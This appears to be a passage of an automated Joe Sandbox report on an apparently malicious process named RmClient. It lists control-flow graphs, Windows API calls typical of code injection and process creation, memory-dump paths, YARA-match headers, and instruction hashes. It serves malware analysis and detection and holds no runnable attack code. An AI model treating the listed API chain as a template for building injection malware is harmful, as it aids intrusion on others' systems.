                                                                                                                      • Instruction Fuzzy Hash: AFE086352446157BD520FA59DC05FD7775CDFC5754F404015FA0CA7142CA71790187F5

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 519 53098b-5309af 521 5309b1-5309c7 519->521 522 5309f4-530a04 519->522 523 530a0d-530a7a call 54b1b0 call 54bbc0 call 5341d0 call 521410 call 5418c0 521->523 522->523 534 530a9a-530aa0 523->534 535 530a7c-530a8b PostThreadMessageW 523->535 535->534 536 530a8d-530a97 535->536 536->534
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 8b33e8794dd317a9e6fc126776e8feb1a58c8a1635324930f27a7fe06ac6a747
                                                                                                                      • Instruction ID: 5ba73c696cd3d627cd95fd4a0b92784b487f824b45fa71fab02b517e822f79aa
                                                                                                                      • Opcode Fuzzy Hash: 8b33e8794dd317a9e6fc126776e8feb1a58c8a1635324930f27a7fe06ac6a747
                                                                                                                      • Instruction Fuzzy Hash: 4C216B72D0429D7FEF119BB49C95AEFBFBCEF82364F044198F94867182D2614D0587A1

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 537 530957-530967 538 530969 537->538 539 5309bc-530a7a call 54b1b0 call 54bbc0 call 5341d0 call 521410 call 5418c0 537->539 538->539 551 530a9a-530aa0 539->551 552 530a7c-530a8b PostThreadMessageW 539->552 552->551 553 530a8d-530a97 552->553 553->551
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 5a3e00590b4390e2241640e478fe02140869a724d49190a5a6f659aca5588c86
                                                                                                                      • Instruction ID: 42709c61520c9e38b1cbcca0855886444eb6b4464e519117d4041b83656da88c
                                                                                                                      • Opcode Fuzzy Hash: 5a3e00590b4390e2241640e478fe02140869a724d49190a5a6f659aca5588c86
                                                                                                                      • Instruction Fuzzy Hash: 0711E17290024DBAEB11EAA49C92DEFBFBCEF913A4F108564F904A7141D2748D068BA1

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 554 530a06-530a22 555 530a2a-530a7a call 54bbc0 call 5341d0 call 521410 call 5418c0 554->555 556 530a25 call 54b1b0 554->556 565 530a9a-530aa0 555->565 566 530a7c-530a8b PostThreadMessageW 555->566 556->555 566->565 567 530a8d-530a97 566->567 567->565
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 4496963ff81daae8c4e050f592e5ffa739b6b8dc2b2086e21c23d605cee49869
                                                                                                                      • Instruction ID: fbc3af9c00e220659403bbc9bdc64d15db407dda8940dac5e37481b8535621d4
                                                                                                                      • Opcode Fuzzy Hash: 4496963ff81daae8c4e050f592e5ffa739b6b8dc2b2086e21c23d605cee49869
                                                                                                                      • Instruction Fuzzy Hash: C511C272D4025D7EEF10DAA09C85DEFBF7CEF913A8F048064F918A7241D2695E0687A1

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 568 530a10-530a22 569 530a2a-530a7a call 54bbc0 call 5341d0 call 521410 call 5418c0 568->569 570 530a25 call 54b1b0 568->570 579 530a9a-530aa0 569->579 580 530a7c-530a8b PostThreadMessageW 569->580 570->569 580->579 581 530a8d-530a97 580->581 581->579
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 00530A87
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 6d98e36d58be551e4f06ac56f9a6ae9f16aec90b9d66c54e3891da6bc62aa6d9
                                                                                                                      • Instruction ID: b4f1c70d30869556dc8bbd0cc13105f83fd68dab1d8faf217205179fd43fa848
                                                                                                                      • Opcode Fuzzy Hash: 6d98e36d58be551e4f06ac56f9a6ae9f16aec90b9d66c54e3891da6bc62aa6d9
                                                                                                                      • Instruction Fuzzy Hash: B401C472D0025D7AEF10EAE09C85DEFBF7CEF81398F008065F90467141E6749E0687A1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                      • Opcode ID: 820045f0e54815265ef8cfa34ec5def86a9d299a782aef65bd96770867440a54
                                                                                                                      • Instruction ID: 9fd347d29fd72ddf4dd2b34bf8c5529c8ae49de2752f400a33a7d25d5ee51774
                                                                                                                      • Opcode Fuzzy Hash: 820045f0e54815265ef8cfa34ec5def86a9d299a782aef65bd96770867440a54
                                                                                                                      • Instruction Fuzzy Hash: 4E311DB9A0060AAFDB00DFD8DC809EFB7B9BF88304F108559F515AB214D775EE458BA0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                      • Opcode ID: 17288157ecd1c6762428be00133c07c2a5cfd08cff1082ec98bee9e619f81e42
                                                                                                                      • Instruction ID: 0ee86a146d64eb37663700ec8d7895e10a2b3278eae497fcab001c93a36c80b3
                                                                                                                      • Opcode Fuzzy Hash: 17288157ecd1c6762428be00133c07c2a5cfd08cff1082ec98bee9e619f81e42
                                                                                                                      • Instruction Fuzzy Hash: 20310EB9A0060AAFDB10DFD8DC809EFB7B9BF88304F108559E515EB214D775EE458BA0
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00534242
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,00537FAE,00000010,?,?,?,00000044,?,00000010,00537FAE,?,?,?), ref: 005494E3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 005299E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E8560001,00000007,00000000,00000004,00000000,00533A5A,000000F4), ref: 0054942C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(005316B9,?,?,005316B9,_ST,?,?,005316B9,_ST,00001000,?,?,00000000), ref: 005493DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,005319B0,00547C9F,_ST,00531973), ref: 00537E13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_520000_RmClient.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0